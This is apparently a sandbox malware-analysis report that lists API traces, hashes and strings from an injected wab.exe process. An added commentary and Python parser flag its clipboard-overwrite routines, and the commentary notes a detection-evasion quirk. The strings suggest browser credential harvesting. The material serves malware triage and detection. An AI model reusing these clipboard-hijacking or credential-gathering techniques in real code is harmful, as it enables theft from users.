• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
• Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
• Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
• Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
• Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
• Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
• Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
• Opcode Fuzzy Hash: 76666c15a4f564bdc8b3974c5ec8ac4f97962fb961b88abffc2f38e87d9a93de
• Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
• Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
• Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
• Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
• Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
Uniqueness
• Uniqueness Score: -1.00%

APIs
• EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
• Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
• Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
• Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
• Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?), ref: 0044DEB6
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
• Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
• Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
• Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1863332320-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
• String ID:
• API String ID: 1828521557-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
• memcpy.MSVCRT ref: 00406942
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@FilePointermemcpy
• String ID:
• API String ID: 609303285-0
                                                                                                                                                                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
• Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
• Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
• Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
• Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
• Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
• Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
• Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
• Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
Uniqueness
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalFix.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnWire.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
• String ID:
• API String ID: 2565263379-0
• Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
• Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
• Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
• Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalFix.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT ref: 004098B5
• GlobalUnWire.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
• String ID:
• API String ID: 2014503067-0
• Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
• Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
• Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
• Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
Uniqueness
Uniqueness Score: -1.00%
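The two entries above (call sites 004098EC and 00409882 in the injected wab.exe image, process 4) are the evidence behind the "Contains functionality to modify clipboard data" signature in the overview: both routines call EmptyClipboard, allocate a global buffer, fill it either from a file (GetFileSize/ReadFile) or from an in-memory wide string (wcslen/memcpy), and hand it to SetClipboardData with a first argument of 0000000D, which is CF_UNICODETEXT in winuser.h. GlobalFix/GlobalUnWire are old 16-bit compatibility exports that take the place GlobalLock/GlobalUnlock usually occupy in this sequence, so a detection rule keyed only on GlobalLock would miss it. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses "APIs" blocks in the format shown on this page (the two clipboard blocks are embedded inline as input) and flags a clipboard-overwrite routine, decoding the format constant. The block format, the CF_* table and the `clipboard_write` heuristic are my own assumptions about what a triage script would want.

```python
import re
from dataclasses import dataclass
from typing import Optional

# The "APIs" lines of the two clipboard entries above, embedded so the script runs offline.
CLIPBOARD_STRING_ENTRY = """\
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalFix.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT ref: 004098B5
• GlobalUnWire.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
"""

CLIPBOARD_FILE_ENTRY = """\
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalFix.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnWire.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
"""

# One report line: optional "Part of subcall function XXXXXXXX:", Name.MODULE, optional
# "(args)", then "ref: ADDR". Names like ??3@YAXPAX@Z contain no '.', so [^\s.(]+ is safe.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^\s.(]+)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Standard clipboard format identifiers from winuser.h (subset).
CF_FORMATS = {1: "CF_TEXT", 2: "CF_BITMAP", 7: "CF_OEMTEXT", 8: "CF_DIB",
              13: "CF_UNICODETEXT", 15: "CF_HDROP", 17: "CF_DIBV5"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list              # int for values the sandbox resolved, None for '?'
    ref: int                # address of the call site
    caller: Optional[int]   # set when the line is "Part of subcall function ..."


def parse_api_block(text: str) -> list:
    """Turn the bullet lines of one APIs block into ApiCall records (non-matching lines skipped)."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args = []
        if m.group("args"):
            for a in m.group("args").split(","):
                a = a.strip()
                args.append(None if a == "?" else int(a, 16))  # "-00000210" parses as negative
        caller = int(m.group("caller"), 16) if m.group("caller") else None
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), caller))
    return calls


def clipboard_write(calls: list) -> Optional[dict]:
    """Heuristic: report a clipboard overwrite if the routine itself calls SetClipboardData.

    Only direct calls (caller is None) count for ordering; subcall lines belong to callees.
    """
    direct = [c for c in calls if c.caller is None]
    names = [c.name for c in direct]
    if "SetClipboardData" not in names:
        return None
    idx = names.index("SetClipboardData")
    fmt = direct[idx].args[0] if direct[idx].args else None
    if any(c.name == "ReadFile" for c in calls):
        source = "file"
    elif any(c.name in ("wcslen", "memcpy") for c in calls):
        source = "string"
    else:
        source = "unknown"
    return {
        "ref": direct[idx].ref,
        "format": CF_FORMATS.get(fmt, hex(fmt) if fmt is not None else "?"),
        "emptied_first": "EmptyClipboard" in names[:idx],   # existing content discarded
        "closed_after": "CloseClipboard" in names[idx:],
        "source": source,
    }


if __name__ == "__main__":
    for label, block in (("string", CLIPBOARD_STRING_ENTRY), ("file", CLIPBOARD_FILE_ENTRY)):
        print(label, clipboard_write(parse_api_block(block)))
```

Run against the two blocks, the script reports CF_UNICODETEXT writes at 004098C7 (source "string") and 00409955 (source "file"), each preceded by EmptyClipboard and followed by CloseClipboard. The same parser can be pointed at any other APIs block on the page to list its direct and subcall API references by module.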

APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• ??3@YAXPAX@Z.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,75B9DF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 403622227-2664311388
• Opcode ID: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
• Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
• Opcode Fuzzy Hash: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
• Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memcpy.MSVCRT ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 577499730-1134094380
• Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
• Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
• Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
• Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
• Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
• Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
• Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
• Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Strings
Memory Dump Source
• Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wab.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
